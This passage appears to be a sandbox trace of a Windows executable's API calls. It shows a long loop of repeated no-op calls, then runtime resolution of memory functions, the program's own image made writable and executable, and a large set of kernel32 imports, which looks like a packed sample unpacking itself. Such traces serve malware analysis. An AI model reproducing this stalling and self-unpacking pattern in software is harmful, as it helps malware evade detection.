nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.913] AddAtomA (lpString=0x0) returned 0x0 [0130.913] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.913] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.913] AddAtomA (lpString=0x0) returned 0x0 [0130.913] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.913] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.913] AddAtomA (lpString=0x0) returned 0x0 [0130.913] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.913] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.913] AddAtomA (lpString=0x0) returned 0x0 [0130.913] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.913] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.913] AddAtomA (lpString=0x0) returned 0x0 [0130.914] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.914] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.914] AddAtomA (lpString=0x0) returned 0x0 [0130.914] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.914] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.914] AddAtomA (lpString=0x0) returned 0x0 [0130.914] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.914] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.914] AddAtomA (lpString=0x0) returned 0x0 [0130.914] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.914] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.914] AddAtomA (lpString=0x0) returned 0x0 [0130.914] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.914] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.914] AddAtomA (lpString=0x0) returned 0x0 [0130.914] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.914] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.914] AddAtomA (lpString=0x0) returned 0x0 [0130.914] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.914] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.914] AddAtomA (lpString=0x0) returned 0x0 [0130.914] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.914] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.914] AddAtomA (lpString=0x0) returned 0x0 [0130.914] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.914] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.914] AddAtomA (lpString=0x0) returned 0x0 [0130.914] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.914] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.914] AddAtomA (lpString=0x0) returned 0x0 [0130.915] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.915] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.915] AddAtomA (lpString=0x0) returned 0x0 [0130.915] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.915] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.915] AddAtomA (lpString=0x0) returned 0x0 [0130.915] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.915] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.915] AddAtomA (lpString=0x0) returned 0x0 [0130.915] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.915] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.915] AddAtomA (lpString=0x0) returned 0x0 [0130.915] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.915] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.915] AddAtomA (lpString=0x0) returned 0x0 [0130.915] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.915] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.915] AddAtomA (lpString=0x0) returned 0x0 [0130.915] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.915] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.915] AddAtomA (lpString=0x0) returned 0x0 [0130.915] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.915] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.915] AddAtomA (lpString=0x0) returned 0x0 [0130.915] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.915] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.915] AddAtomA (lpString=0x0) returned 0x0 [0130.915] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.915] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.915] AddAtomA (lpString=0x0) returned 0x0 [0130.916] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.916] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.916] AddAtomA (lpString=0x0) returned 0x0 [0130.916] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.916] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.916] AddAtomA (lpString=0x0) returned 0x0 [0130.916] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.916] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.916] AddAtomA (lpString=0x0) returned 0x0 [0130.916] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.916] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.916] AddAtomA (lpString=0x0) returned 0x0 [0130.916] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.916] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.916] AddAtomA (lpString=0x0) returned 0x0 [0130.916] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.916] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.916] AddAtomA (lpString=0x0) returned 0x0 [0130.916] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.916] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.916] AddAtomA (lpString=0x0) returned 0x0 [0130.916] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.916] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.916] AddAtomA (lpString=0x0) returned 0x0 [0130.916] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.916] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.916] AddAtomA (lpString=0x0) returned 0x0 [0130.916] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.916] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.917] AddAtomA (lpString=0x0) returned 0x0 [0130.917] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.917] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.917] AddAtomA (lpString=0x0) returned 0x0 [0130.917] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.917] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.917] AddAtomA (lpString=0x0) returned 0x0 [0130.917] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.917] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.917] AddAtomA (lpString=0x0) returned 0x0 [0130.917] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.917] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.917] AddAtomA (lpString=0x0) returned 0x0 [0130.917] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.917] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.917] AddAtomA (lpString=0x0) returned 0x0 [0130.917] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.917] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.917] AddAtomA (lpString=0x0) returned 0x0 [0130.917] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.917] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.917] AddAtomA (lpString=0x0) returned 0x0 [0130.917] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.917] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.917] AddAtomA (lpString=0x0) returned 0x0 [0130.917] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.917] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.917] AddAtomA (lpString=0x0) returned 0x0 [0130.917] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.917] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.917] AddAtomA (lpString=0x0) returned 0x0 [0130.918] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.918] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.918] AddAtomA (lpString=0x0) returned 0x0 [0130.918] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.918] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.918] AddAtomA (lpString=0x0) returned 0x0 [0130.918] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.918] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.918] AddAtomA (lpString=0x0) returned 0x0 [0130.918] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.918] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.918] AddAtomA (lpString=0x0) returned 0x0 [0130.918] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.918] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.918] AddAtomA (lpString=0x0) returned 0x0 [0130.918] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.918] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.918] AddAtomA (lpString=0x0) returned 0x0 [0130.918] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.918] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.918] AddAtomA (lpString=0x0) returned 0x0 [0130.918] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.918] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.918] AddAtomA (lpString=0x0) returned 0x0 [0130.918] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.918] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.918] AddAtomA (lpString=0x0) returned 0x0 [0130.918] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.918] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.918] AddAtomA (lpString=0x0) returned 0x0 [0130.919] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.919] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.919] AddAtomA (lpString=0x0) returned 0x0 [0130.919] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.919] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.919] AddAtomA (lpString=0x0) returned 0x0 [0130.919] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.919] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.919] AddAtomA (lpString=0x0) returned 0x0 [0130.919] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.919] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.919] AddAtomA (lpString=0x0) returned 0x0 [0130.919] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.919] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.919] AddAtomA (lpString=0x0) returned 0x0 [0130.919] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.919] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.919] AddAtomA (lpString=0x0) returned 0x0 [0130.919] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.919] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.919] AddAtomA (lpString=0x0) returned 0x0 [0130.919] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.919] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.919] AddAtomA (lpString=0x0) returned 0x0 [0130.919] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.919] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.919] AddAtomA (lpString=0x0) returned 0x0 [0130.919] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.919] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.920] AddAtomA (lpString=0x0) returned 0x0 [0130.920] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.920] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.920] AddAtomA (lpString=0x0) returned 0x0 [0130.920] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.920] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.920] AddAtomA (lpString=0x0) returned 0x0 [0130.920] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.920] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.920] AddAtomA (lpString=0x0) returned 0x0 [0130.920] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.920] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.920] AddAtomA (lpString=0x0) returned 0x0 [0130.920] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.920] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.920] AddAtomA (lpString=0x0) returned 0x0 [0130.920] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.920] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.920] AddAtomA (lpString=0x0) returned 0x0 [0130.920] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.920] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.920] AddAtomA (lpString=0x0) returned 0x0 [0130.920] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.920] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.920] AddAtomA (lpString=0x0) returned 0x0 [0130.920] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.920] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.920] AddAtomA (lpString=0x0) returned 0x0 [0130.920] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.920] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.921] AddAtomA (lpString=0x0) returned 0x0 [0130.921] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.921] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.921] AddAtomA (lpString=0x0) returned 0x0 [0130.921] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.921] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.921] AddAtomA (lpString=0x0) returned 0x0 [0130.921] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.921] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.921] AddAtomA (lpString=0x0) returned 0x0 [0130.921] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.921] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.921] AddAtomA (lpString=0x0) returned 0x0 [0130.921] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.921] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.921] AddAtomA (lpString=0x0) returned 0x0 [0130.921] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.921] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.921] AddAtomA (lpString=0x0) returned 0x0 [0130.921] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.921] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.941] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0130.942] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0130.942] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0130.942] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0130.942] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0130.942] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0130.942] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0130.942] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0130.942] SetErrorMode (uMode=0x400) returned 0x0 [0130.942] SetErrorMode (uMode=0x0) returned 0x400 [0130.942] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0130.942] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0130.945] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0131.000] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.001] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0131.001] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0131.001] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0131.001] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0131.001] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0131.001] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0131.001] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0131.001] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0131.001] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0131.001] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0131.002] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0131.003] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0131.004] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0131.005] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0131.005] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0131.005] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0131.005] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0131.005] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0131.005] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0131.005] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0131.005] 